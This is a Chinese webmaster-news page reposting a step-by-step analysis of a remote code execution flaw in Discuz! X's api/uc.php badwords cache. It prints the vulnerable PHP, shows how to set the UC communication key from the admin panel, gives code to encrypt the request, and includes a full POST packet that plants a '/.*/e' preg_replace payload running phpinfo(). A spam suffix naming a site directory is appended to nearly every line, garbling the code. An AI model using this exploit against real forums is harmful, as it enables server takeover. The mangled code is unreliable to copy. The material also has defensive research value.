当前位置: 首页 > 站长资讯 > 正文页面

Discuz! X系列远程代码执行漏洞分析

0x01 漏洞根源Fko网站目录_网站网址收录与提交入口

这个问题的根源在于api/uc.php文件中的updatebadwords方法,代码如下:Fko网站目录_网站网址收录与提交入口

function updatebadwords($get, $post) {Fko网站目录_网站网址收录与提交入口

global $_G;Fko网站目录_网站网址收录与提交入口

if(!API_UPDATEBADWORDS) {Fko网站目录_网站网址收录与提交入口

return API_RETURN_FORBIDDEN;Fko网站目录_网站网址收录与提交入口

}Fko网站目录_网站网址收录与提交入口

$data = array();Fko网站目录_网站网址收录与提交入口

if(is_array($post)) {Fko网站目录_网站网址收录与提交入口

foreach($post as $k => $v) {Fko网站目录_网站网址收录与提交入口

$data['findpattern'][$k] = $v['findpattern'];Fko网站目录_网站网址收录与提交入口

$data['replace'][$k] = $v['replacement'];Fko网站目录_网站网址收录与提交入口

}Fko网站目录_网站网址收录与提交入口

}Fko网站目录_网站网址收录与提交入口

$cachefile = DISCUZ_ROOT.'./uc_client/data/cache/badwords.php';Fko网站目录_网站网址收录与提交入口

$fp = fopen($cachefile, 'w');Fko网站目录_网站网址收录与提交入口

$s = ";Fko网站目录_网站网址收录与提交入口

$s .= '$_CACHE[/'badwords/'] = '.var_export($data, TRUE).";/r/n";Fko网站目录_网站网址收录与提交入口

fwrite($fp, $s);Fko网站目录_网站网址收录与提交入口

fclose($fp);Fko网站目录_网站网址收录与提交入口

return API_RETURN_SUCCEED;Fko网站目录_网站网址收录与提交入口

}Fko网站目录_网站网址收录与提交入口

方法参数中的$get和$post就是用户所传入的内容,从上面代码我们可以看出在解析$post内容之后,将其写入到名为badwords的缓存中。这里代码使用了var_export来避免用户传递单引号来封闭之前语句,注入php代码。Fko网站目录_网站网址收录与提交入口

但是这里有两个关键词让我眼前一亮“findpattern”和“replacement”,也就是说这个缓存内容是会被作为执行的。那么如果我向findpattern中传入带有e参数的正则表达式,不就可以实现任意代码执行了吗?Fko网站目录_网站网址收录与提交入口

0x02 漏洞触发Fko网站目录_网站网址收录与提交入口

全局代码搜了下badwords,用的地方比较少,主要集中在uc的pm和user模块中。这里我用user来举例,在uc_client/model/user.php文件中有一个check_usernamecensor方法,来校验用户名中是否有badwords,如果有的话就将他替换掉,代码如下:Fko网站目录_网站网址收录与提交入口

function check_usernamecensor($username) {Fko网站目录_网站网址收录与提交入口

$_CACHE['badwords'] = $this->base->cache('badwords');Fko网站目录_网站网址收录与提交入口

$censorusername = $this->base->get_setting('censorusername');Fko网站目录_网站网址收录与提交入口

$censorusername = $censorusername['censorusername'];Fko网站目录_网站网址收录与提交入口

$censorexp = '/^('.str_replace(array('//*', "/r/n", ' '), array('.*', '|', ''), preg_quote(($censorusername = trim($censorusername)), '/')).')$/i';Fko网站目录_网站网址收录与提交入口

$usernamereplaced = isset($_CACHE['badwords']['findpattern']) && !empty($_CACHE['badwords']['findpattern']) ? @preg_replace($_CACHE['badwords']['findpattern'], $_CACHE['badwords']['replace'], $username) : $username;Fko网站目录_网站网址收录与提交入口

if(($usernamereplaced != $username) || ($censorusername && preg_match($censorexp, $username))) {Fko网站目录_网站网址收录与提交入口

return FALSE;Fko网站目录_网站网址收录与提交入口

} else {Fko网站目录_网站网址收录与提交入口

return TRUE;Fko网站目录_网站网址收录与提交入口

}Fko网站目录_网站网址收录与提交入口

}Fko网站目录_网站网址收录与提交入口

可以看到代码中使用了preg_replace,那么如果我们的正则表达式写成“/.*/e",就可以在使用这个方法的地方进行任意代码执行了。而这个方法在disucz中,只要是添加或者修改用户名的地方都会用到。Fko网站目录_网站网址收录与提交入口

0x03 漏洞利用Fko网站目录_网站网址收录与提交入口

首先我们们访问api/uc.php(居然可以直接访问,好开心),之后我们会发现uc处理机制中比较讨厌的环节——用户传递的参数需要经过UC_KEY加密:Fko网站目录_网站网址收录与提交入口

if(!defined('IN_UC')) {Fko网站目录_网站网址收录与提交入口

require_once '../source/class/class_core.php';Fko网站目录_网站网址收录与提交入口

$discuz = C::app();Fko网站目录_网站网址收录与提交入口

$discuz->init();Fko网站目录_网站网址收录与提交入口

require DISCUZ_ROOT.'./config/config_ucenter.php';Fko网站目录_网站网址收录与提交入口

$get = $post = array();Fko网站目录_网站网址收录与提交入口

$code = @$_GET['code'];Fko网站目录_网站网址收录与提交入口

parse_str(authcode($code, 'DECODE', UC_KEY), $get);Fko网站目录_网站网址收录与提交入口

所以这里需要有个前提,需要知道UC_KEY或者可以操控UC_KEY。那么问题来了,我们要怎么达到这个前提呢?Fko网站目录_网站网址收录与提交入口

我们在后台中站长->UCenter设置中发现有“UCenter 通信密钥”这个字段,这是用于操控discuz和uc连接的app key,而非高级的uc_server key,不过对于我们getshell来说足够了。在这里修改为任意值,这样我们就获取到了加密用的key值了。Fko网站目录_网站网址收录与提交入口


Fko网站目录_网站网址收录与提交入口

从下图我们可以看到,配置文件已经被修改了:Fko网站目录_网站网址收录与提交入口

Fko网站目录_网站网址收录与提交入口

然后我们在自己搭建的discuz的api/uc.php文件中添加两行代码,来加密get请求所需要的内容:Fko网站目录_网站网址收录与提交入口

$a = 'time='.time().'&action=updatebadwords';Fko网站目录_网站网址收录与提交入口

$code = authcode($a, 'ENCODE', 'tang3');Fko网站目录_网站网址收录与提交入口

echo $code;exit;Fko网站目录_网站网址收录与提交入口

这样我们就可以获取到加密后的code值了!Fko网站目录_网站网址收录与提交入口


Fko网站目录_网站网址收录与提交入口

然后用post方法向api/uc.php发送带有正则表达式信息的xml数据包,请求头中有两个地方需要注意,一个是formhash,一个是刚才获取的code需要进行一次url编码,否则解密会出现问题。我使用的数据包如下图所示:Fko网站目录_网站网址收录与提交入口

POST /discuzx3.220150602/api/uc.php?formhash=e6d7c425&code=38f8nhcm4VRgdUvoEUoEs/OpuXNJDgh0Qfep%2bT52HDEyTpHnR4PQ80%2be%2bNCyOWI0DMrXizYwbGFcM/J0Y3a8Zc/N HTTP/1.1Fko网站目录_网站网址收录与提交入口

Host: 192.168.188.144Fko网站目录_网站网址收录与提交入口

Proxy-Connection: keep-aliveFko网站目录_网站网址收录与提交入口

Content-Length: 178Fko网站目录_网站网址收录与提交入口

Cache-Control: max-age=0Fko网站目录_网站网址收录与提交入口

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Fko网站目录_网站网址收录与提交入口

Origin: http://192.168.188.144Fko网站目录_网站网址收录与提交入口

User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2415.0 Safari/537.36Fko网站目录_网站网址收录与提交入口

Content-Type: text/xmlFko网站目录_网站网址收录与提交入口

Referer: http://192.168.188.144/discuzx3.220150602/admin.php?action=setting&operation=ucFko网站目录_网站网址收录与提交入口

Accept-Encoding: gzip, deflateFko网站目录_网站网址收录与提交入口

Accept-Language: zh-CN,zh;q=0.8,en;q=0.6Fko网站目录_网站网址收录与提交入口

Cookie: FPDO_2132_saltkey=Z777zGG4; FPDO_2132_lastvisit=1432691505; FPDO_2132_ulastactivity=5830S8vsYWw6CpVTPpdtOgw6cPIZugHKtMQidjBgfdqDGbQJfSmj; so6a_2132_saltkey=JjZJ2klz; so6a_2132_lastvisit=1433227409; so6a_2132_nofavfid=1; so6a_2132_forum_lastvisit=D_2_1433233630; so6a_2132_visitedfid=2; so6a_2132_editormode_e=1; so6a_2132_smile=1D1; so6a_2132_lastcheckfeed=1%7C1433239071; XDEBUG_SESSION=PHPSTORM; so6a_2132_ulastactivity=5238LLJuvhc%2FhKaXEaIzRYm5hbbEAlOy3RL8Lc92aDETkVQJidZY; so6a_2132_auth=96c9HcEpd8OxPZh6GE5stu4Uov%2BUncVwxWbetMvF%2BFZLNuEVj8VoiFyDMkWkXdQ81eg%2F6522CLnsHbkzv%2Fdu; so6a_2132_creditnotice=0D0D2D0D0D0D0D0D0D1; so6a_2132_creditbase=0D0D10D0D0D0D0D0D0; so6a_2132_creditrule=%E6%AF%8F%E5%A4%A9%E7%99%BB%E5%BD%95; so6a_2132_checkupgrade=1; so6a_2132_lastact=1433476664%09admin.php%09; so6a_2132_sid=LE2xb1Fko网站目录_网站网址收录与提交入口

/.*/eFko网站目录_网站网址收录与提交入口

phpinfo();Fko网站目录_网站网址收录与提交入口

发送后可以发现uc_client/data/cache目录下的badwords.php内容变为了我们刚刚设定的正则表达式的样子:Fko网站目录_网站网址收录与提交入口


Fko网站目录_网站网址收录与提交入口

之后利用方法就有很多种了,可以通过增加一个用户来实现代码执行,也可以通过发消息的方式来触发,这里我以添加一个用户为例。Fko网站目录_网站网址收录与提交入口


Fko网站目录_网站网址收录与提交入口


Fko网站目录_网站网址收录与提交入口

0x04 漏洞总结Fko网站目录_网站网址收录与提交入口

漏洞小结Fko网站目录_网站网址收录与提交入口

1.影响范围个人评价为“高”,Discuz! X系列cms在国内使用范围极广,几乎所有中小型论坛都是用它搭建的。Fko网站目录_网站网址收录与提交入口

2.危害性个人评价为“高”,这个漏洞不只是单纯的后台代码执行,在uc_app key泄露的情况下也是可以利用的,很多转账对于uc_app key重视程度不是很大,所以相对来说危害性还是非常高的。Fko网站目录_网站网址收录与提交入口

希望本文所述对大家的Discuz程序有所帮助Fko网站目录_网站网址收录与提交入口

  

此文由 网站目录_网站网址收录与提交入口 编辑,未经允许不得转载!:

相关文章